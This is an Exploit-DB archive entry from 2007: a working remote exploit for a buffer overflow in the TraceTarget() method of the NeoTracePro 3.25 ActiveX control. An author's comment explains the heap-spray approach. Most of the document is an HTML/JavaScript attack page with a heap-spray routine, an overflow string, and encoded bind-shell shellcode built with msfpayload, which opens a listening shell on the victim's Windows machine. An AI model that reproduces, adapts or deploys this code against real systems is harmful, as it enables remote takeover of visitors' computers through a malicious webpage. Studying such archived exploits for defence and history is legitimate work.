NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow

EDB-ID:

4158


Author:

nitr0us

Type:

remote


Platform:

Windows

Date:

2007-07-07


<!--
/* PUBLIC SINCE MAY 31th 2007 */

/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE  *** PRIVATE ****/
____________________________________________________________________________
NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll]
Remote 0-day Exploit
Risk Level: High
Impact: Remote command execution
Author: A. Alejandro Hernández aka nitr0us <nitrousenador@gmail.com>
Date:  24/03/07
México
____________________________________________________________________________
/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE  *** PRIVATE ****/

I found this buffer overflow fuzzing NeoTraceExplorer.dll (an ActiveX Control) with ComRaider from iDefense.
It has a method called TraceTarget() which can be exploited passing a large string (~486 bytes) due there's no boundary checking.

Unfortunately, somebody else found this vulnerability few months ago, but this person didn't release an exploit ;)
just published an advisory ( http://secunia.com/advisories/23463).

First of all, this b0f cannot be exploitable with the classic technique (EIP points to an address that has a 'jmp esp') because
each byte of the ret address MUST BE between 0x00 and 0x7f (ascii values), in other case, InternetExplorer will change
the out-of-range bytes to 0x3f ('?' character) and EIP will point to and invalid address.
Example:
I've an 'jmp esp' @ 0x7c951eed in ntdll.dll, if I set the ret address to 0x7c951eed, when the buffer gets passed from
Internet Explorer to TraceTarget(), it will overwrite EIP with: 0x7c3f1e3f (bullshit!).

So, The Skylined's Heap Spraying technique comes into my mind... and here is, working so fuckin' fine =).

TESTED ON:  Windows XP SP 2 (Spanish) + Internet Explorer 7.0.5730.11 + NeoTracePro 3.25

Greetz to: Crypkey, alt3kx, zonartm.org, dex, Optix, Nahual, ran.
-->

<html>
       <head>
               <title>
                       NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
               </title>
       </head>

       <body bgcolor=black text=white link=white alink=white vlink=white>
               <center>

               <object classid="clsid:3E1DD897-F300-486C-BEAF-711183773554" id="NeoTracePro"></object>

               <b>/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE  *** PRIVATE ****/</b><br><br>
               NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit<br>
               by <a href="mailto:nitrousenador@gmail.com">nitr0us</a><br>
               <a href="http://www.genexx.org/nitrous/" target=_blank>www.genexx.org/nitrous/</a><br><br>

               <input type="button" value="Exploit!" onClick="exploit()">

               <script>
                       function exploit(){
                               var Target      = ""; // Exploit string
                               var PwnEIP      = 486; // bytes to reach EIP
                               var     Ninja   = "\x05\x05\x05\x05"; // ret address = 0x05050505
                               /* The fscking shellc0de, bind port 64876 [nitro ;)], encoded with Skylined's Alpha2 encoder and finally converted to utf-16 */
                               // $./msfpayload win32_bind LPORT=64876 R | ./msfencode -t raw -b '\x00' -e Alpha2 | ./beta --utf-16 > shellcode.txt
                               // beta encoder src: http://www.edup.tudelft.nl/~bjwever/src/beta.c
                               var ShellCode = unescape(
                               "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4937%u4949%u4949%u4949%u4949%u4949%u4949%u4949" +
                               "%u5a51%u626a%u3058%u3042%u4150%u416b%u7241%u4132%u4142%u3242%u4142%u4230%u5841%u4138" +
                               "%u5042%u7a75%u6b49%u434c%u585a%u726b%u4d6d%u5938%u4969%u496f%u696f%u516f%u4c70%u324b" +
                               "%u444c%u4164%u4e34%u476b%u4735%u4e4c%u636b%u744c%u3245%u5358%u5a31%u4c4f%u724b%u756f" +
                               "%u6e48%u536b%u576f%u3650%u4861%u636b%u4e79%u706b%u6c34%u644b%u6a41%u544e%u4f71%u4f30" +
                               "%u6e69%u6b4c%u4f34%u5130%u4464%u5a47%u3961%u545a%u444d%u6f41%u4a32%u494b%u6564%u426b" +
                               "%u6474%u7164%u6138%u5a65%u6e45%u636b%u656f%u6574%u7851%u556b%u6c36%u664b%u506c%u4c4b" +
                               "%u514b%u474f%u456c%u7851%u776b%u5473%u6e6c%u4e6b%u7269%u614c%u5734%u426c%u4f41%u4633" +
                               "%u4b51%u316b%u4c74%u714b%u5053%u4c30%u614b%u6650%u6c6c%u344b%u3730%u4c6c%u4c6d%u474b" +
                               "%u6730%u4178%u734e%u6e58%u326e%u766e%u5a6e%u764c%u4b30%u484f%u4256%u7246%u7573%u4336" +
                               "%u3458%u7473%u4272%u5448%u3237%u3453%u7372%u426f%u6b74%u7a4f%u7070%u5868%u584b%u4b6d" +
                               "%u774c%u304b%u4b50%u5a4f%u5376%u6d6f%u4b59%u6355%u4f56%u6a71%u534d%u3438%u6642%u7235" +
                               "%u444a%u3942%u386f%u5050%u6e68%u6439%u4b49%u6e45%u304d%u4b57%u494f%u5346%u3063%u6353" +
                               "%u3663%u5333%u3163%u5153%u3043%u3343%u4b63%u4a4f%u5070%u7166%u4978%u526d%u434c%u5656" +
                               "%u4c33%u4d49%u6e31%u5075%u4c68%u3464%u505a%u6f70%u4637%u3937%u4e6f%u7036%u746a%u4350" +
                               "%u7661%u7935%u586f%u6150%u6d78%u4e74%u764d%u6d4e%u5239%u7977%u4e6f%u3336%u3363%u4965" +
                               "%u4a6f%u5370%u4958%u3775%u4e39%u7066%u4649%u4b37%u4e4f%u6636%u7630%u6634%u6634%u6935" +
                               "%u486f%u7a50%u4233%u3948%u7077%u7879%u3146%u5069%u3957%u6b6f%u5366%u6965%u686f%u6550" +
                               "%u7336%u655a%u7034%u3166%u5178%u7273%u6f4d%u6d79%u3135%u427a%u6670%u4139%u5839%u6e4c" +
                               "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" +
                               "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" +
                               "%u424f%u3055%u5944%u796f%u6346%u706b%u7257%u7272%u4671%u5031%u3251%u644a%u7041%u3251" +
                               "%u4171%u4645%u3931%u6a6f%u6370%u4c58%u6e6d%u5739%u5875%u434e%u4963%u6b6f%u5166%u4b7a" +
                               "%u6b4f%u754f%u6967%u686f%u4e50%u366b%u3937%u4c6c%u3843%u5044%u4964%u5a6f%u4676%u4932" +
                               "%u7a6f%u7570%u6c38%u6e30%u456a%u7154%u464f%u6b33%u4e4f%u6b36%u6e4f%u6230");
                               var heapSprayToAddress = 0x05050505; // Spray up to this address
                               var heapBlockSize = 0x400000; // Size of the blocks we want to create
                               var heapHdrSize = 0x38; // The size of the header of heap blocks in MSIE
                               var payLoadSize = ShellCode.length * 2; // Size of the shellcode (convert dwords to bytes)
                               var spraySlideSize = heapBlockSize - (payLoadSize + heapHdrSize); //  Size of the nopslide
                               var spraySlide = unescape("%u4141%u4141"); // NOP Slide filled with 0x41 ( inc ecx)
                               var heapBlocks = (heapSprayToAddress - 0x400000) / heapBlockSize; // Number of heap blocks

                               spraySlide = getSpraySlide(spraySlide, spraySlideSize);

                               // We are going to create large blocks that will contain:
                               // [heap header][nopslide...........................][shellcode]
                               memory = new Array();
                               for (k = 0; k < heapBlocks; k++)
                                       memory[k] = spraySlide + ShellCode;

                               // Create the Target string
                               while(Target.length < PwnEIP)
                                       Target += "A";
                               Target += Ninja;

                               // Exploit !
                               NeoTracePro.TraceTarget(Target);
                       }

                       function getSpraySlide(spraySlide, spraySlideSize){
                               // The quickest way to create large blocks of memory is doubling their size untill they are
                               // big enough (or too big, in which case we cut them back to size.)
                               while(spraySlide.length * 2 < spraySlideSize)
                                       spraySlide += spraySlide;

                               spraySlide = spraySlide.substring(0, spraySlideSize / 2);

                               return spraySlide;
                       }
               </script>
               </center>
       </body>
</html>

# milw0rm.com [2007-07-07]